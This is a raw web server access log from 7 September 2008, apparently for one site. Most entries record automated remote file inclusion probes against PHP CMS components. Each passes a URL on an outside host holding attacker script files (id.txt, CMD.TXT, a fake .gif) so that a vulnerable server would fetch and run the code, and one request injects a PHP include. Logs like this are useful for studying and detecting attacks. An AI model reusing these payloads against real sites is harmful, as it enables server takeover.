63.247.141.8 - - [07/Sep/2008:05:46:32 -0400] "GET /?custompluginfile[]=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 200 9432
63.247.141.8 - - [07/Sep/2008:05:46:32 -0400] "GET /log/?custompluginfile[]=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 200 57863
118.127.10.64 - - [07/Sep/2008:05:47:17 -0400] "GET /log/sdaglobal.org-access_log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 355
118.127.10.64 - - [07/Sep/2008:05:47:17 -0400] "GET /log/sdaglobal.org-access_log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 355
218.103.242.154 - - [07/Sep/2008:05:48:11 -0400] "GET /favicon.ico HTTP/1.1" 404 292
82.194.86.185 - - [07/Sep/2008:05:50:46 -0400] "GET /log/sdaglobal.org-error_log.4///vwar/backup/errors.php?error=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 404 335
89.108.67.220 - - [07/Sep/2008:05:58:47 -0400] "GET /log/sdaglobal.org-error_log.4/errors.php?error=http://giam.go.ro/id8.txt???? HTTP/1.1" 404 321
89.108.67.220 - - [07/Sep/2008:05:58:49 -0400] "GET /errors.php?error=http://giam.go.ro/id8.txt???? HTTP/1.1" 404 291
89.108.67.220 - - [07/Sep/2008:05:58:50 -0400] "GET /log/errors.php?error=http://giam.go.ro/id8.txt???? HTTP/1.1" 404 295
218.162.125.80 - - [07/Sep/2008:05:59:37 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
67.212.173.42 - - [07/Sep/2008:06:00:01 -0400] "GET /log/sdaglobal.org-access_log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 339
67.212.173.42 - - [07/Sep/2008:06:00:01 -0400] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 310
67.212.173.42 - - [07/Sep/2008:06:00:02 -0400] "GET /log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 314
81.171.86.86 - - [07/Sep/2008:06:00:47 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 339
81.171.86.86 - - [07/Sep/2008:06:00:48 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 308
72.22.73.127 - - [07/Sep/2008:06:03:11 -0400] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.maisondesarts.ca//modules/natan/id.txt? HTTP/1.1" 404 310
202.181.105.117 - - [07/Sep/2008:06:03:35 -0400] "GET /log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 327
202.181.105.117 - - [07/Sep/2008:06:03:36 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 323
69.41.180.138 - - [07/Sep/2008:06:03:40 -0400] "GET /log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 327
69.41.180.138 - - [07/Sep/2008:06:03:40 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 323
202.181.105.117 - - [07/Sep/2008:06:03:45 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 323
202.181.105.117 - - [07/Sep/2008:06:03:46 -0400] "GET /log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 327
85.25.150.230 - - [07/Sep/2008:06:04:09 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 323
85.25.150.230 - - [07/Sep/2008:06:04:15 -0400] "GET /log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 327
67.212.173.42 - - [07/Sep/2008:06:04:24 -0400] "GET /log/sdaglobal.org-error_log.4//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 340
62.87.154.41 - - [07/Sep/2008:06:08:02 -0400] "GET /log/sdaglobal.org-access_log.1%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 386
62.87.154.41 - - [07/Sep/2008:06:08:02 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 354
62.87.154.41 - - [07/Sep/2008:06:08:02 -0400] "GET /log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 358
67.212.173.42 - - [07/Sep/2008:06:08:38 -0400] "GET /log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 314
67.212.173.42 - - [07/Sep/2008:06:08:38 -0400] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 310
62.87.154.41 - - [07/Sep/2008:06:09:09 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 385
62.87.154.41 - - [07/Sep/2008:06:09:25 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 383
85.25.129.240 - - [07/Sep/2008:06:09:30 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 323
85.25.129.240 - - [07/Sep/2008:06:09:30 -0400] "GET /log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 327
205.234.185.182 - - [07/Sep/2008:06:10:51 -0400] "GET /admin/addons/archive/archive.php?adminfolder=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 313
87.238.199.32 - - [07/Sep/2008:06:11:16 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 354
87.238.199.32 - - [07/Sep/2008:06:11:17 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 385
87.238.199.32 - - [07/Sep/2008:06:11:17 -0400] "GET /log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 358
208.64.230.55 - - [07/Sep/2008:06:11:49 -0400] "GET /log/sdaglobal.org-access_log.1//components/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 334
208.64.230.55 - - [07/Sep/2008:06:11:49 -0400] "GET //components/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 303
208.64.230.55 - - [07/Sep/2008:06:11:50 -0400] "GET /log//components/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 307
209.172.55.178 - - [07/Sep/2008:06:12:24 -0400] "GET /log/sdaglobal.org-access_log//convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 327
209.172.55.178 - - [07/Sep/2008:06:12:24 -0400] "GET //convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 298
209.172.55.178 - - [07/Sep/2008:06:12:24 -0400] "GET /log//convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 302
209.172.55.178 - - [07/Sep/2008:06:13:13 -0400] "GET /log/sdaglobal.org-access_log//convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 327
209.172.55.178 - - [07/Sep/2008:06:13:13 -0400] "GET //convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 298
209.172.55.178 - - [07/Sep/2008:06:13:13 -0400] "GET /log//convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 302
208.64.230.55 - - [07/Sep/2008:06:13:16 -0400] "GET //components/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 303
208.64.230.55 - - [07/Sep/2008:06:13:16 -0400] "GET //components/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 303
208.64.230.55 - - [07/Sep/2008:06:16:18 -0400] "GET /log/sdaglobal.org-access_log.1//components/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 334
208.64.230.55 - - [07/Sep/2008:06:16:18 -0400] "GET //components/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 303
208.64.230.55 - - [07/Sep/2008:06:16:18 -0400] "GET /log//components/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 307
205.234.185.182 - - [07/Sep/2008:06:17:23 -0400] "GET /log/sdaglobal.org-access_log/admin/addons/archive/archive.php?adminfolder=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 342
205.234.185.182 - - [07/Sep/2008:06:17:23 -0400] "GET /log/admin/addons/archive/archive.php?adminfolder=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 317
194.165.49.171 - - [07/Sep/2008:06:17:24 -0400] "GET /log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 326
194.165.49.171 - - [07/Sep/2008:06:17:24 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 322
209.172.55.178 - - [07/Sep/2008:06:17:28 -0400] "GET /log/sdaglobal.org-access_log.1//convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 329
205.234.185.182 - - [07/Sep/2008:06:17:42 -0400] "GET /log/sdaglobal.org-error_log.4/admin/addons/archive/archive.php?adminfolder=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 343
209.172.55.178 - - [07/Sep/2008:06:17:50 -0400] "GET /log/sdaglobal.org-access_log.1//convert/mvcw.php?step=1&vwar_root=http://indocairo.net/id.txt?? HTTP/1.1" 404 329
77.88.192.8 - - [07/Sep/2008:06:18:44 -0400] "GET /log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 326
77.88.192.8 - - [07/Sep/2008:06:18:44 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 322
208.64.230.55 - - [07/Sep/2008:06:19:51 -0400] "GET //components/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 303
208.64.230.55 - - [07/Sep/2008:06:20:29 -0400] "GET //components/errors.php?error=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 303
118.232.193.175 - - [07/Sep/2008:06:22:11 -0400] "GET / HTTP/1.1" 200 9432
118.232.193.175 - - [07/Sep/2008:06:22:13 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 200 4389
118.232.193.175 - - [07/Sep/2008:06:22:13 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 200 9017
118.232.193.175 - - [07/Sep/2008:06:22:15 -0400] "GET /images/welcome.gif HTTP/1.1" 200 2565
118.232.193.175 - - [07/Sep/2008:06:22:16 -0400] "GET /images/select.gif HTTP/1.1" 200 1792
118.232.193.175 - - [07/Sep/2008:06:22:16 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
118.232.193.175 - - [07/Sep/2008:06:22:17 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
118.232.193.175 - - [07/Sep/2008:06:22:17 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
118.232.193.175 - - [07/Sep/2008:06:22:18 -0400] "GET /images/czech.gif HTTP/1.1" 200 1137
118.232.193.175 - - [07/Sep/2008:06:22:18 -0400] "GET /images/filipino.gif HTTP/1.1" 200 1328
118.232.193.175 - - [07/Sep/2008:06:22:19 -0400] "GET /images/france.gif HTTP/1.1" 200 1094
118.232.193.175 - - [07/Sep/2008:06:22:19 -0400] "GET /images/germany.gif HTTP/1.1" 200 986
118.232.193.175 - - [07/Sep/2008:06:22:20 -0400] "GET /images/hungary.gif HTTP/1.1" 200 1115
118.232.193.175 - - [07/Sep/2008:06:22:20 -0400] "GET /images/india.gif HTTP/1.1" 200 1050
118.232.193.175 - - [07/Sep/2008:06:22:21 -0400] "GET /images/italy.gif HTTP/1.1" 200 1095
118.232.193.175 - - [07/Sep/2008:06:22:21 -0400] "GET /images/japan.gif HTTP/1.1" 200 1104
118.232.193.175 - - [07/Sep/2008:06:22:23 -0400] "GET /images/korea.gif HTTP/1.1" 200 1387
118.232.193.175 - - [07/Sep/2008:06:22:23 -0400] "GET /images/nepal.gif HTTP/1.1" 200 1130
118.232.193.175 - - [07/Sep/2008:06:22:26 -0400] "GET /images/portugal.gif HTTP/1.1" 200 1322
118.232.193.175 - - [07/Sep/2008:06:22:26 -0400] "GET /images/russia.gif HTTP/1.1" 200 1039
118.232.193.175 - - [07/Sep/2008:06:22:28 -0400] "GET /images/spain.gif HTTP/1.1" 200 1360
118.232.193.175 - - [07/Sep/2008:06:22:28 -0400] "GET /images/sweden.gif HTTP/1.1" 200 1104
118.232.193.175 - - [07/Sep/2008:06:22:30 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
77.88.192.8 - - [07/Sep/2008:06:23:07 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 322
59.125.183.76 - - [07/Sep/2008:06:27:20 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 291
194.165.49.171 - - [07/Sep/2008:06:27:41 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 353
194.165.49.171 - - [07/Sep/2008:06:27:41 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 322
194.165.49.171 - - [07/Sep/2008:06:27:42 -0400] "GET /log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 326
194.165.49.171 - - [07/Sep/2008:06:29:47 -0400] "GET /log/sdaglobal.org-error_log.3/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 352
59.125.183.76 - - [07/Sep/2008:06:30:16 -0400] "GET /log/sdaglobal.org-error_log.4//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 321
59.125.183.76 - - [07/Sep/2008:06:30:18 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 291
59.125.183.76 - - [07/Sep/2008:06:30:19 -0400] "GET /log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 295
77.88.192.8 - - [07/Sep/2008:06:30:58 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 353
77.88.192.8 - - [07/Sep/2008:06:30:58 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 322
77.88.192.8 - - [07/Sep/2008:06:30:59 -0400] "GET /log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 326
77.88.192.8 - - [07/Sep/2008:06:33:05 -0400] "GET /log/sdaglobal.org-error_log.3/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 352
83.240.154.200 - - [07/Sep/2008:06:34:05 -0400] "GET /log/sdaglobal.org-error_log.4//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://tricospeb.net/wow/pix/idi.txt?? HTTP/1.1" 404 339
83.240.154.200 - - [07/Sep/2008:06:34:05 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://tricospeb.net/wow/pix/idi.txt?? HTTP/1.1" 404 309
59.125.183.76 - - [07/Sep/2008:06:34:05 -0400] "GET /log/sdaglobal.org-error_log.3//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 321
83.240.154.200 - - [07/Sep/2008:06:34:05 -0400] "GET /log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://tricospeb.net/wow/pix/idi.txt?? HTTP/1.1" 404 313
83.240.154.200 - - [07/Sep/2008:06:34:34 -0400] "GET /log/sdaglobal.org-access_log.1//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://tricospeb.net/wow/pix/idi.txt?? HTTP/1.1" 404 340
72.47.213.57 - - [07/Sep/2008:06:37:08 -0400] "GET /errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 291
72.47.213.57 - - [07/Sep/2008:06:37:10 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 320
72.47.213.57 - - [07/Sep/2008:06:37:11 -0400] "GET /errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 291
72.47.213.57 - - [07/Sep/2008:06:37:11 -0400] "GET /log/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 295
66.249.66.66 - - [07/Sep/2008:06:40:14 -0400] "GET /images/anxiyuan.gif HTTP/1.1" 304 -
72.47.213.57 - - [07/Sep/2008:06:41:51 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 322
77.91.224.3 - - [07/Sep/2008:06:43:25 -0400] "GET /robots.txt HTTP/1.1" 404 291
77.91.224.3 - - [07/Sep/2008:06:43:25 -0400] "GET /log/ HTTP/1.1" 200 57890
194.165.49.171 - - [07/Sep/2008:06:43:39 -0400] "GET /log/sdaglobal.org-error_log.3/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 352
194.165.49.171 - - [07/Sep/2008:06:43:39 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 322
194.165.49.171 - - [07/Sep/2008:06:43:39 -0400] "GET /log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 326
194.165.49.171 - - [07/Sep/2008:06:43:42 -0400] "GET /log/sdaglobal.org-error_log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 350
121.135.142.207 - - [07/Sep/2008:06:43:58 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 313
121.135.142.207 - - [07/Sep/2008:06:43:59 -0400] "GET /log/sdaglobal.org-access_log//skin/zero_vote/ask_password.php?dir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 342
121.135.142.207 - - [07/Sep/2008:06:43:59 -0400] "GET /log//skin/zero_vote/ask_password.php?dir=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 317
190.54.62.91 - - [07/Sep/2008:06:46:09 -0400] "GET //?prefix=http://www.folio.fr/images/inv?? HTTP/1.1" 200 9432
190.54.62.91 - - [07/Sep/2008:06:46:09 -0400] "GET /log//?prefix=http://www.folio.fr/images/inv?? HTTP/1.1" 200 57894
190.54.62.91 - - [07/Sep/2008:06:46:12 -0400] "GET /log/sdaglobal.org-access_log.1//?prefix=http://www.folio.fr/images/inv?? HTTP/1.1" 404 313
190.54.62.91 - - [07/Sep/2008:06:46:51 -0400] "GET /log/sdaglobal.org-access_log//?prefix=http://www.folio.fr/images/inv?? HTTP/1.1" 404 311
77.88.192.8 - - [07/Sep/2008:06:50:24 -0400] "GET //index.php?option=com_poll&Itemid=52&mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 291
77.88.192.8 - - [07/Sep/2008:06:50:56 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?option=com_poll&Itemid=52&mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 322
77.88.192.8 - - [07/Sep/2008:06:50:57 -0400] "GET //index.php?option=com_poll&Itemid=52&mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 291
77.88.192.8 - - [07/Sep/2008:06:50:57 -0400] "GET /log//index.php?option=com_poll&Itemid=52&mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 295
203.146.102.38 - - [07/Sep/2008:06:52:13 -0400] "GET //components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/id.txt? HTTP/1.1" 404 329
193.164.131.35 - - [07/Sep/2008:06:52:34 -0400] "GET /log/sdaglobal.org-error_log.2//components/com_directory/modules/mod_pxt_latest.php?GLOBALS%5bmosConfig_absolute_path%5d=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 363
193.164.131.35 - - [07/Sep/2008:06:52:35 -0400] "GET //components/com_directory/modules/mod_pxt_latest.php?GLOBALS%5bmosConfig_absolute_path%5d=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 333
193.164.131.35 - - [07/Sep/2008:06:52:35 -0400] "GET /log//components/com_directory/modules/mod_pxt_latest.php?GLOBALS%5bmosConfig_absolute_path%5d=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 337
211.255.32.168 - - [07/Sep/2008:06:53:17 -0400] "GET /log/sdaglobal.org-access_log.1/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 319
211.255.32.168 - - [07/Sep/2008:06:53:17 -0400] "GET /log/sdaglobal.org-access_log.1/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 319
211.255.32.168 - - [07/Sep/2008:06:53:18 -0400] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 288
211.255.32.168 - - [07/Sep/2008:06:53:18 -0400] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 288
211.255.32.168 - - [07/Sep/2008:06:53:18 -0400] "GET /log/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 292
211.255.32.168 - - [07/Sep/2008:06:53:18 -0400] "GET /log/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 292
81.176.226.180 - - [07/Sep/2008:06:55:45 -0400] "GET /log/sdaglobal.org-error_log.4%20/errors.php?error=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 322
81.176.226.180 - - [07/Sep/2008:06:56:16 -0400] "GET /log/sdaglobal.org-error_log.4%20/errors.php?error=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt??? HTTP/1.1" 404 322
139.146.146.34 - - [07/Sep/2008:06:56:46 -0400] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 290
211.255.32.168 - - [07/Sep/2008:06:56:55 -0400] "GET /log/sdaglobal.org-access_log.1/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 319
211.255.32.168 - - [07/Sep/2008:06:56:56 -0400] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 288
211.255.32.168 - - [07/Sep/2008:06:56:56 -0400] "GET /log/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 292
194.135.105.1 - - [07/Sep/2008:06:57:40 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 322
194.135.105.1 - - [07/Sep/2008:06:57:41 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 291
194.135.105.1 - - [07/Sep/2008:06:57:41 -0400] "GET /log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.giochiamonline.com/comunity/rss?? HTTP/1.1" 404 295
69.41.180.138 - - [07/Sep/2008:07:02:01 -0400] "GET /log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 337
69.41.180.138 - - [07/Sep/2008:07:02:01 -0400] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 333
202.181.105.117 - - [07/Sep/2008:07:02:56 -0400] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 333
202.181.105.117 - - [07/Sep/2008:07:02:56 -0400] "GET /log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 337
217.160.189.11 - - [07/Sep/2008:07:03:07 -0400] "GET /errors.php?error=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 291
193.164.131.35 - - [07/Sep/2008:07:03:22 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 322
87.226.77.5 - - [07/Sep/2008:07:04:28 -0400] "GET /log/sdaglobal.org-access_log.1/admin/editor2/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 348
